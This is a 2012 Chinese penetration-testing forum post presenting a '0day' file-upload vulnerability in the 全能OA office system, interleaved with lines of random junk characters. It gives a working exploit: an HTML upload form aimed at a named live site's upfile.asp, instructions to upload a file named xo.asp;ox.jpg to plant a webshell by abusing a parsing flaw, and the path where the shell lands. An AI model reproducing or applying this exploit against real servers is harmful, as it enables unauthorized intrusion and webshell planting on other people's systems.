中国网络渗透测试联盟
标题:
全能OA办公系统0day OA办公系统漏洞 上传漏洞
[打印本页]
作者:
admin
时间:
2012-11-21 13:45
标题:
全能OA办公系统0day OA办公系统漏洞 上传漏洞
全能OA办公系统 上传漏洞
. Q8 k: A5 |4 C$ v" _& F
, l6 B/ C4 d* c e- G! a
系统介绍:
n8 G0 w0 g9 k4 _! `
7 V( {- r+ X% w
全能OA办公系统2012是功能非常强大的OA系统,目前功能已完全能满足日常办公需要。
& I! E, x8 e5 Q
) k; @, H+ `8 {! B$ n$ x
主要功能:
5 F; h" @' [! L" ^) s. h H
公司通告
1 k8 ~& B, z8 H- r# f( ~6 F
工作计划
( i* S5 Q& p& W8 f. C# f( E9 K- C' e
通讯助理
v% H; W8 d+ ]2 m$ q z% c6 Z
客户资源
2 v _$ e9 @0 ~8 q7 w: J
我的公文
, b7 Y# @* J6 @
公文传阅
" {0 T s& \5 o' ?5 d' ]5 D2 M3 C* A3 d
公共资源
3 {9 s, |* J" F. N+ Q' x- p8 l
资源预约
- W/ f& v! m1 T; H, V6 y
今日考勤
( o/ {: t5 H! p; n
个人计划
7 T( {$ a/ k- d& K! ~ V
个人通讯录
9 t3 u) i4 v% p5 s/ x9 `: {1 _2 z
个人基本档案
4 u5 I" g+ C4 F( J# ^; B0 l: }
未读邮件
- `9 R( ? F1 b# f
发邮件
; \) |3 x6 ~$ E/ R% ^' w' J, D
收件夹
) m/ `* L7 J' T0 U$ V) K
寄件夹
7 t5 {& t* }$ y8 H+ ~( P3 G& Z
网络硬盘
. y$ w3 P* u) A1 c5 w0 g0 [8 E
网络会议
; D& j& g; `7 \6 D. K
网络调查
1 R; ]9 j" ~0 C1 f/ F) r
交流论坛
|2 j' u* h/ M& p Y2 @
! U. v& O1 D1 v7 M9 Z
有兴趣测试的朋友可以下源码看看
/ _! h' w" W0 x6 M @5 g* q
- L- v1 G0 S. f/ u
源码下载:
: Q+ w* y. O% z
4 i0 e9 |! |4 N9 R* H4 G4 i' P
http://www.mycodes.net/30/4750.htm
0 p$ z, u- @: z' I' X- J
( e4 n8 }$ L# |) V d$ [$ k
漏洞介绍:
) _% O0 M/ R4 }6 d
# N9 O7 }! X5 [: e- l6 G; z
由upfile.asp上传文件漏洞引起
S8 U! I+ S) \
2 o5 G/ z/ K U7 B7 l
测试方法:
# B5 x9 C7 [* P- p
7 |# ~1 f( a% d6 R1 x* L( I
使用名小子上传
http://www.itlynn.com/upfile.asp
即可
# A* ^1 D( @5 G$ s5 w# S6 j! |
' y1 t6 Z1 H0 c8 p6 ^% `) U
如果upfile.asp文件被删除不存在。
" G: @+ G+ Q( R% m9 d- b
4 }7 B' U! L" X w. D$ ~+ Q) T
那么可以试着访问
http://www.itlynn.com/upfile/upfile.asp
。
6 P) L3 }; D- _4 a2 }* V
3 K/ S5 ~5 G; V' E
如果存在那么将如下代码保存为upfile.html。
9 `) n: D8 L! F1 o$ K `' g' |
8 X% L# S: r+ v& @- }
然后将action的参数修改为目标站点的url。例如
http://www.itlynn.com/upfile/upfile.asp
。
: b4 s* L n" C' ~7 p
% H0 l2 Z% l7 ?
1 l! ]% Q9 K1 g% H* W7 X& c1 S
* F6 H8 c8 i( v5 n
01 <table border='0' align="center" cellpadding="5">
$ A9 i: A. W' |7 U
: |% O. n" t* y# h: N. q8 X$ z
02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1">
3 F. H6 T/ w4 W2 |# X/ j
1 E! ?) k& j1 g" B
03 <tr>
# I1 ?) x1 b1 {- A' J v: z, Z
) X# a+ A& h! Z g
04 <td>报错:</td>
9 J+ `3 u. _7 [% Z
# m( u3 y+ G9 r9 p
05 <td><input type='radio' name='errnumber' value='0'>
; {2 m) |% h. U4 D; D# z( h
4 [1 ]; z+ e4 K& X
06 自动更名
- }4 W$ \$ j, \ f. l- D& f) @
0 d0 S# [$ Y l# D8 F
07 <input type='radio' name='errnumber' value='1' checked>
# Z8 w: e: J5 X# g# U7 ?& W
' J% i" r1 r, r, L6 A6 N9 l
08 报错方式
( Z# ~% @$ G7 ^. U$ K4 B
8 ]' I6 ]; Z0 ^
09 <input type='radio' name='errnumber' value='2'>
2 T7 B# h4 n+ Q, d; P Q6 V1 F
% }8 u" a+ a( ^0 U
10 直接覆盖</td>
; |# u3 B" Z- ^% K' H$ d0 L& y) Y
2 s6 y2 D# ?" o9 E4 n0 M) _! H
11 </tr>
8 b. i9 q% o' {+ c4 d4 Q
. q( A O* e7 e0 o
12 <tr>
5 S# P! ^) M7 L; F) s7 a @7 l. ]
$ f4 s. }. f' ~: X
13 <td>主题:</td>
0 F6 F8 D0 M, d! ^# Q# ]
2 a" z$ k: K; Q4 \* Z& L, J
14 <td><input type='text' name='filename' size='30'></td>
- o4 ?* k5 H* \# k8 \7 k! I
- S$ a+ j" ^ s2 o |
15 </tr>
2 b! d. P+ |- s T/ c
. R6 M) b" n) G5 Q/ x( ]2 b2 n0 V
16 <tr>
% b9 o5 |7 C/ O& d
% Q, v# ^, O0 {2 ~
17 <td>文件:</td>
2 e7 S8 S. B/ x7 d( h$ c
$ e1 W. C7 h4 i
18 <td><input type="file"name="fruit"size="30"></td>
& B- `- |* l& n6 G5 g+ f; r2 M3 Y, T
: {- `' [1 b8 [6 @3 p% g1 {
19 </tr>
T$ i" {. K, t+ D! }9 f3 J; @+ z" N6 ^
' o8 v2 ~7 a- [+ M, Y
20 <tr>
7 }# }( @( U7 ^
. w6 o4 \# \0 S6 W# Z. c
21 <td valign='top'>简介:</td>
1 Y- W7 _" l, ]0 a. w# w0 h e# {7 m1 Z
4 P& H' M2 W+ q1 q. Y& L& @
22 <td><textarea name='fileExt' cols='40' rows='5'></textarea></td>
9 B5 a( f4 q5 q4 i+ ?4 U
5 X* F4 y' s) ^4 ^$ ?! G* ?
23 </tr>
; Z; j$ B. j: A2 Z2 s; F+ W% _
* O! `! {& e; R
24
( D, a3 c8 \' i c B
9 P2 W5 B' G5 l$ l0 l
25 <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td>
* j, W1 `, n3 ^! @
! y- y* a7 d, w8 `; X8 [
26 </tr>
" h6 t; Q, X5 T2 I. \* }# P
# q- M/ d% |4 _; R1 |
27 </form>
F3 t" T2 P2 Q2 R( N. [ `$ g
) z) l2 j# h6 L4 h
然后打开上传一个文件名为xo.asp;ox.jpg的文件。
. f$ E I4 d5 E$ F' w1 R
- `) A9 e+ ~2 Y, O9 d& I/ C$ K7 \9 f
+ q/ c }$ h& `. x
! @6 k- |, _5 C% ?9 }6 y5 Y
上传成功后,马的路径是:
http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg
9 [9 X' T# ?2 V9 O5 V6 G
& O8 d- h" E' [, Q1 G: S
此漏洞需要配合解析漏洞利用。
& T) g; e( V t) j
! b n- E+ ^( D( r8 ^
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2